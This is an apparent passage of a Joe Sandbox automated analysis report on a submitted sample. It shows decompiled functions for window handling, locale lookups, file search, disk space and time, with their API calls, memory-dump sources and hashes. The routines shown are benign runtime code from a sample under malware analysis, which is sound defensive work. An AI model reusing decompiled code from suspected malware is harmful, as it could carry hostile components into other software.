                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,?,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00406076
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004060DA
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001), ref: 0040610F
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5), ref: 00406122
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000), ref: 0040612F
                                                                                                                                                                                          • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278), ref: 0040613B
                                                                                                                                                                                          • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040616F
                                                                                                                                                                                          • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040617B
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040619D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                          • API String ID: 3245196872-1565342463
                                                                                                                                                                                          • Opcode ID: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                                                                                                                                                          • Instruction ID: 0b7a158813eaac7eeaad4be5227783dc720e21281ab2719b2f6a7295f4a4c489
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                                                                                                                                                          • Instruction Fuzzy Hash: B341A272900158AFEB10DBA9CC85BDEB3EDDF44304F1501B7E94AF7282D6389E548B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045A054 Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E0045A054(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E0045973C();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E00441704( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E0045906C( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E00441704( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00407540();
					}
					if( *((short*)(_t40 + 0x11a)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x118))();
					}
				}
				return _t21;
			}






                                                                                                                                                                                          0x0045a056
                                                                                                                                                                                          0x0045a058
                                                                                                                                                                                          0x0045a05c
                                                                                                                                                                                          0x0045a063
                                                                                                                                                                                          0x0045a06b
                                                                                                                                                                                          0x0045a070
                                                                                                                                                                                          0x0045a074
                                                                                                                                                                                          0x0045a07d
                                                                                                                                                                                          0x0045a0e1
                                                                                                                                                                                          0x0045a0e4
                                                                                                                                                                                          0x0045a0a0
                                                                                                                                                                                          0x0045a0a4
                                                                                                                                                                                          0x0045a0b6
                                                                                                                                                                                          0x0045a0bc
                                                                                                                                                                                          0x0045a0c0
                                                                                                                                                                                          0x0045a0c5
                                                                                                                                                                                          0x0045a0c7
                                                                                                                                                                                          0x0045a0cc
                                                                                                                                                                                          0x0045a0d1
                                                                                                                                                                                          0x0045a0d1
                                                                                                                                                                                          0x0045a0d4
                                                                                                                                                                                          0x0045a0d5
                                                                                                                                                                                          0x0045a0d5
                                                                                                                                                                                          0x0045a0f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045a0fb
                                                                                                                                                                                          0x0045a0f1
                                                                                                                                                                                          0x0045a103

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsIconic.USER32 ref: 0045A05C
                                                                                                                                                                                          • SetActiveWindow.USER32(00000000,00000000,?,?,0045A790), ref: 0045A074
                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0045A097
                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045A790), ref: 0045A0C0
                                                                                                                                                                                          • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 0045A0D5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1720852555-0
                                                                                                                                                                                          • Opcode ID: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                                                                                                                                                          • Instruction ID: fcf5efa9db48042d746d78bebf6e1cf2cc32c712e84d9ef6b3749e70c2da43cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                                                                                                                                                          • Instruction Fuzzy Hash: EF110071650200EBDB54EE69C9C6B9637E8AF04715F0800AABF04DF2D7D679EC448759
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E088 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E0040E088(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40e0ec);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E00404C30( &_v16, 7,  &_v11);
				_push(_v16);
				E00409664(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040E0F3);
				return E004049C0( &_v16);
			}








                                                                                                                                                                                          0x0040e088
                                                                                                                                                                                          0x0040e091
                                                                                                                                                                                          0x0040e096
                                                                                                                                                                                          0x0040e097
                                                                                                                                                                                          0x0040e09c
                                                                                                                                                                                          0x0040e09f
                                                                                                                                                                                          0x0040e0ae
                                                                                                                                                                                          0x0040e0be
                                                                                                                                                                                          0x0040e0c6
                                                                                                                                                                                          0x0040e0cf
                                                                                                                                                                                          0x0040e0d8
                                                                                                                                                                                          0x0040e0db
                                                                                                                                                                                          0x0040e0de
                                                                                                                                                                                          0x0040e0eb

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040E0EC), ref: 0040E0AE
                                                                                                                                                                                          • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040E0EC), ref: 0040E0C7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                          • Opcode ID: 3e76f24c8c21c81d0cc01981c64ac9dfe6251fba8f699f9195c6452e2773ecb4
                                                                                                                                                                                          • Instruction ID: 7c6682d932fdf235f30c9e422d46d0a378ce0b1a8e98ecff7cc19f77d6cd180e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e76f24c8c21c81d0cc01981c64ac9dfe6251fba8f699f9195c6452e2773ecb4
                                                                                                                                                                                          • Instruction Fuzzy Hash: DCF0F671E08308ABEB00EBB2C85298EB3AEE7C4714F50C97AB110A36C1DA7C65018659
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409B1C Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409B1C(void* __eax, WORD* __ecx, signed int __edx) {
				WORD* _t15;
				void* _t21;
				long _t22;

				_t15 = __ecx;
				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
				_t21 = FindFirstFileA(E00404E80(__eax), __ecx + 0x18);
				 *((intOrPtr*)(_t15 + 0x14)) = _t21;
				if(_t21 == 0xffffffff) {
					_t22 = GetLastError();
				} else {
					_t22 = E00409AB8(_t15);
					if(_t22 != 0) {
						E00409B90(_t15);
					}
				}
				return _t22;
			}






                                                                                                                                                                                          0x00409b1f
                                                                                                                                                                                          0x00409b28
                                                                                                                                                                                          0x00409b3c
                                                                                                                                                                                          0x00409b3e
                                                                                                                                                                                          0x00409b44
                                                                                                                                                                                          0x00409b61
                                                                                                                                                                                          0x00409b46
                                                                                                                                                                                          0x00409b4d
                                                                                                                                                                                          0x00409b51
                                                                                                                                                                                          0x00409b55
                                                                                                                                                                                          0x00409b55
                                                                                                                                                                                          0x00409b51
                                                                                                                                                                                          0x00409b68

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00409B37
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?), ref: 00409B5C
                                                                                                                                                                                            • Part of subcall function 00409AB8: FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                            • Part of subcall function 00409AB8: FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                            • Part of subcall function 00409B90: FindClose.KERNEL32(?,?,00409B5A,00000000,?), ref: 00409B9C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 976985129-0
                                                                                                                                                                                          • Opcode ID: 206278be2afaca1b4f319956ce3570142da68117e331f24925d14e23edf1462c
                                                                                                                                                                                          • Instruction ID: 79fd7835e2b2924360e3ee9b5121bf30e16e58b6cc0e4d1406ffac342d6b08ee
                                                                                                                                                                                          • Opcode Fuzzy Hash: 206278be2afaca1b4f319956ce3570142da68117e331f24925d14e23edf1462c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58E03962F0122007C7156A7E688159A65DC6A85778349037FF914FB3C7D63CEC0643E9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409ED2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409ED2(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E004059A0(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E004059A0(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

















                                                                                                                                                                                          0x00409edb
                                                                                                                                                                                          0x00409ee0
                                                                                                                                                                                          0x00409ee2
                                                                                                                                                                                          0x00409ee2
                                                                                                                                                                                          0x00409ef5
                                                                                                                                                                                          0x00409f04
                                                                                                                                                                                          0x00409f07
                                                                                                                                                                                          0x00409f14
                                                                                                                                                                                          0x00409f17
                                                                                                                                                                                          0x00409f1c
                                                                                                                                                                                          0x00409f1f
                                                                                                                                                                                          0x00409f21
                                                                                                                                                                                          0x00409f2e
                                                                                                                                                                                          0x00409f31
                                                                                                                                                                                          0x00409f36
                                                                                                                                                                                          0x00409f39
                                                                                                                                                                                          0x00409f3b
                                                                                                                                                                                          0x00409f44

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00409EF5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DiskFreeSpace
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1705453755-0
                                                                                                                                                                                          • Opcode ID: 17e936c76b5a916fa9e055ffa03c2d06cfaee52abff173c13a90578c20948187
                                                                                                                                                                                          • Instruction ID: 3d4088487c7580c6eb6b6515069bf83f7524b5429ff7be7e0fdab11b3544063a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 17e936c76b5a916fa9e055ffa03c2d06cfaee52abff173c13a90578c20948187
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C1112B5E00209AFDB00CF99C881DAFF7F9FFC8314B54C56AA404E7250E6319E018BA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406AC8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                          			E00406AC8(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x406b2e);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00404C30( &_v20, 7,  &_v15);
				E004035F0(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00406B35);
				return E004049C0( &_v20);
			}








                                                                                                                                                                                          0x00406ad1
                                                                                                                                                                                          0x00406ad6
                                                                                                                                                                                          0x00406ad7
                                                                                                                                                                                          0x00406adc
                                                                                                                                                                                          0x00406adf
                                                                                                                                                                                          0x00406aee
                                                                                                                                                                                          0x00406afe
                                                                                                                                                                                          0x00406b09
                                                                                                                                                                                          0x00406b14
                                                                                                                                                                                          0x00406b14
                                                                                                                                                                                          0x00406b1a
                                                                                                                                                                                          0x00406b1d
                                                                                                                                                                                          0x00406b20
                                                                                                                                                                                          0x00406b2d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                          • Opcode ID: 9bec381cd29c9aaa061bf3c81c5a3fc4dcf617442e55b2fac60aae16296281d1
                                                                                                                                                                                          • Instruction ID: 8c46e58028a20f45c726cdf232f197f4d268d7d6409a4c5068237e5da40a84cb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bec381cd29c9aaa061bf3c81c5a3fc4dcf617442e55b2fac60aae16296281d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F0C871A04319AFE714DFA2CC42A9EB37AF7C4714F51857AA510B71D4E7B82610C684
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C964 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040C964(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E00404A14(_t10, _t18);
				}
				return E00404AB0(_t10, _t5 - 1,  &_v260, _t19);
			}







                                                                                                                                                                                          0x0040c96f
                                                                                                                                                                                          0x0040c971
                                                                                                                                                                                          0x0040c982
                                                                                                                                                                                          0x0040c987
                                                                                                                                                                                          0x0040c989
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c9a1
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                          • Opcode ID: 026571d56001ee72b0406f5d7f97dc349247158a98ed82025b723c8338f8d56e
                                                                                                                                                                                          • Instruction ID: c55d8128e0464d7f0ffda61b66ea8af477aea0d032980e5ba508f3227b3018b3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 026571d56001ee72b0406f5d7f97dc349247158a98ed82025b723c8338f8d56e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 07E092B271421457D314A6695C869EA725C9798310F00427FBA49E73C2EDB89D4446ED
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C9B0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E0040C9B0(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






                                                                                                                                                                                          0x0040c9b3
                                                                                                                                                                                          0x0040c9b4
                                                                                                                                                                                          0x0040c9ca
                                                                                                                                                                                          0x0040c9d1
                                                                                                                                                                                          0x0040c9cc
                                                                                                                                                                                          0x0040c9cc
                                                                                                                                                                                          0x0040c9cc
                                                                                                                                                                                          0x0040c9d7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000002), ref: 0040C9C3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                          • Opcode ID: 5d8534821ffc97822e41bd311946462fda5bd873699444b04a03bff573cbe2e9
                                                                                                                                                                                          • Instruction ID: 274c397104c08bcef1503af243249226e7c8b6f68a7688c9cfeef2f5654669c9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d8534821ffc97822e41bd311946462fda5bd873699444b04a03bff573cbe2e9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 98D05EA630E2546AE214525A2D85DBB5AACCAC57B1F10423FF988E7281D2248C0693BA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B2D4 Relevance: 1.5, APIs: 1, Instructions: 13timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E0040B2D4(long long __fp0) {
				struct _SYSTEMTIME _v16;
				void* _t7;
				long long* _t10;
				void* _t11;
				long long _t12;

				_t12 = __fp0;
				GetLocalTime( &_v16);
				_t7 = E0040B110(_v16.wYear, _v16.wDay, _v16.wMonth, _t11, __fp0);
				 *_t10 = _t12;
				asm("wait");
				return _t7;
			}








                                                                                                                                                                                          0x0040b2d4
                                                                                                                                                                                          0x0040b2dc
                                                                                                                                                                                          0x0040b2f0
                                                                                                                                                                                          0x0040b2f5
                                                                                                                                                                                          0x0040b2f8
                                                                                                                                                                                          0x0040b2ff

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
